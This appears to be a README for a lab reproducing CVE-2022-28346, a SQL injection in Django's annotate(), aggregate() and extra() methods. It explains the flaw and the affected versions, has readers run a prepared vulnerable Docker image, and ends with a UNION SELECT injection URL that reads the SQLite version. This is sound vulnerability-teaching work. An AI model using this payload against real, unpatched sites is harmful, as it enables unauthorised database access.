A flaw was found in the Django package, which leads to a SQL injection. This flaw allows an attacker using a crafted dictionary containing malicious SQL queries to compromise the database completely.
You will find above in the code repository the detailed analysis report (PDF) on CVE-2022-28346.
CVE-2022-28346 is a critical vulnerability identified in various versions of Django, a popular Python web framework. This vulnerability specifically impacts Django versions 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4.
The core of the issue lies in the QuerySet.annotate(), aggregate(), and extra() methods within Django. These methods are vulnerable to SQL injection attacks when column aliases are used in conjunction with a crafted dictionary (with dictionary expansion) as the passed **kwargs. SQL injection is a type of attack that allows an attacker to interfere with the queries that an application makes to its database. It can be used to view data that they are not normally able to retrieve, including data belonging to other users, or any other data that the application itself is able to access. In some cases, an attacker might be able to modify or delete this data, affecting data integrity.
To conduct a thorough test of this vulnerability, ensure that there is ample free space on your hard disk. A minimum of 1.2 GB is required to successfully perform the vulnerability test.
If you already have Docker installed, you can skip this section and proceed directly to the next set of instructions.
To begin testing this vulnerability, install Docker:
Verify that the Docker is operational before moving to the next steps.
In your terminal execute the following command to get the docker image that we have created and pushed to DockerHub :
sudo docker pull marouanekamal/cve-2022-28346:latest
And wait for the Docker image to finish pulling. If you encounter any issues, it may be due to your internet connection; please ensure that you have a stable and active connection.
After the installation ends, verify that the image exists by running the following command :
sudo docker images
You can now run the docker image using the following command :
sudo docker run -p 8000:8000 --name my_cve_container marouanekamal/cve-2022-28346:latest
Now the server is running and we can exploit this CVE ;)
After running the docker image you can enter to the following link to check if the URL is accessible :
http://0.0.0.0:8000/
The word ok displayed which means that the URL is accessible and everything is working fine!
Now let us attack this vulnerability using SQL injection. Type the following URL in order to do so :
http://0.0.0.0:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
We could manage to determine the version of SQLite used by the server ;)
- https://mocusez.site/posts/a3ce.html
- https://blog.csdn.net/weixin_46944519/article/details/128496498
- https://www.cvedetails.com/cve/CVE-2022-28346/?q=CVE-2022-28346
- https://avd.aquasec.com/nvd/2022/cve-2022-28346/
- https://cyber.vumetric.com/vulns/CVE-2022-28346/sql-injection-vulnerability-in-multiple-products/
- https://www.suse.com/security/cve/CVE-2022-28346.html
- https://docs.djangoproject.com/en/4.0/releases/security/
- https://www.freebuf.com/vuls/332893.html
Should you encounter any issues or require clarification on any of the steps, please don't hesitate to reach out via email for assistance :